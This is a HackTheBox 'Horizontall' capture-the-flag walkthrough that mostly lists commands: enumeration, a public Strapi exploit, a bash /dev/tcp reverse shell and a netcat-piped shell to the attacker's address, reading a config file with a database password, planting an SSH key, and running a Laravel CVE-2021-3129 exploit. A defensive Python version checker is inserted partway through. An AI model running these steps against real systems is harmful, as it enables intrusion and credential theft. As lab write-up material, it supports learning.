HackTheBox – Horizontall Walkthrough
┌──(rootkali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.105
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150
┌──(rootkali)-[/home/kali/Downloads]
└─# gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150
http://api-prod.horizontall.htb/reviews
http://api-prod.horizontall.htb/admin
After reading the page source, I got the clue: it is a Strapi login page. I tried basic SQL injections against it but got nothing back. Further enumeration (reading blogs and CVEs about Strapi) led me to an endpoint that reveals the Strapi version:
view-source:http://api-prod.horizontall.htb/admin/strapiVersion
"strapiVersion":"3.0.0-beta.17.4"
https://www.exploit-db.com/exploits/50239
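From the defender's side, the same `/admin/strapiVersion` disclosure is useful for inventory: the snippet below (an added example, not part of the original walkthrough or of Strapi) parses that JSON body and compares the prerelease version string under SemVer rules, where `3.0.0-beta.17.4` sorts before `3.0.0-beta.17.5` and any prerelease sorts before the final `3.0.0`. The minimum-safe floor is an assumption to be replaced with your own advisory data.

```python
import json
import re

# Assumed floor: treat any Strapi release older than this as needing an upgrade.
# The walkthrough does not state the patched version; adjust to your advisory data.
ASSUMED_MIN_SAFE = "3.0.0-beta.17.5"

_SEMVER = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$")


def parse_version(text):
    """Split '3.0.0-beta.17.4' into ((3, 0, 0), ['beta', 17, 4]).

    Numeric prerelease identifiers become ints so they compare numerically
    (17.4 < 17.10), as SemVer requires; a final release has no prerelease part.
    """
    m = _SEMVER.match(text.strip())
    if not m:
        raise ValueError(f"not a semver string: {text!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = m.group(4)
    ids = [int(p) if p.isdigit() else p for p in pre.split(".")] if pre else []
    return core, ids


def _pre_key(ids):
    # SemVer: a release outranks every prerelease; numeric ids rank below
    # alphanumeric ones; otherwise compare element by element, shorter first.
    if not ids:
        return (1,)
    return (0, tuple((0, i, "") if isinstance(i, int) else (1, 0, i) for i in ids))


def is_below(version, floor):
    """True when `version` sorts strictly before `floor` under SemVer 2.0 rules."""
    vc, vp = parse_version(version)
    fc, fp = parse_version(floor)
    return (vc, _pre_key(vp)) < (fc, _pre_key(fp))


def check_strapi_version_body(body, floor=ASSUMED_MIN_SAFE):
    """Parse the /admin/strapiVersion JSON body and flag outdated installs."""
    version = json.loads(body)["strapiVersion"]
    return {"version": version, "outdated": is_below(version, floor)}


if __name__ == "__main__":
    # Constructed sample body, shaped like the response seen in the walkthrough.
    print(check_strapi_version_body('{"strapiVersion":"3.0.0-beta.17.4"}'))
```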
┌──(rootkali)-[/home/kali/Downloads]
└─# python3 50239.py http://api-prod.horizontall.htb/
┌──(rootkali)-[/home/kali/Downloads]
└─# nc -lvnp 6969
$> bash -c 'bash -i >& /dev/tcp/10.10.14.35/6969 0>&1'
strapi@horizontall:/$ cd /opt/
strapi@horizontall:/opt$ cd strapi
strapi@horizontall:~$ cd myapi
strapi@horizontall:~/myapi$ cd config
strapi@horizontall:~/myapi/config$ cd environments
strapi@horizontall:~/myapi/config/environments$ cd development
strapi@horizontall:~/myapi/config/environments/development$ cat database.json
"username": "developer",
"password": "#J!:F9Zt2u"
strapi@horizontall:~/myapi/config/environments/development$ netstat -tulpn | grep LISTEN
When I was scrolling down, I suddenly noticed the open ports on the local machine. Port 3306 is the MySQL connection and port 1337 is for API calls, but port 8000 was strange. I ran a curl command to see what was going on there.
strapi@horizontall:~/myapi/config/environments/development$ curl http://localhost:8000
strapi@horizontall:~/myapi/config/environments/development$ cd ~
strapi@horizontall:~$ cd .ssh
strapi@horizontall:~/.ssh$ ls -lrt
strapi@horizontall:~/.ssh$ cat authorized_keys
strapi@horizontall:~/.ssh$ echo "ssh-rsa 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 root@kali" > authorized_keys
┌──(rootkali)-[/home/kali/Downloads]
└─# ssh -i key -L 8000:127.0.0.1:8000 strapi@horizontall.htb
It was easy to notice that a Laravel v8 application was running on port 8000. I did a quick search for known issues in Laravel v8.
https://github.com/nth347/CVE-2021-3129_exploit
┌──(rootkali)-[/home/kali/Downloads]
└─# git clone https://github.com/nth347/CVE-2021-3129_exploit.git
┌──(rootkali)-[/home/kali/Downloads]
└─# cd CVE-2021-3129_exploit
┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "cat /root/root.txt"
┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]
└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "nc 10.10.14.35 6666 | /bin/bash 2>&1 | nc 10.10.14.35 6667"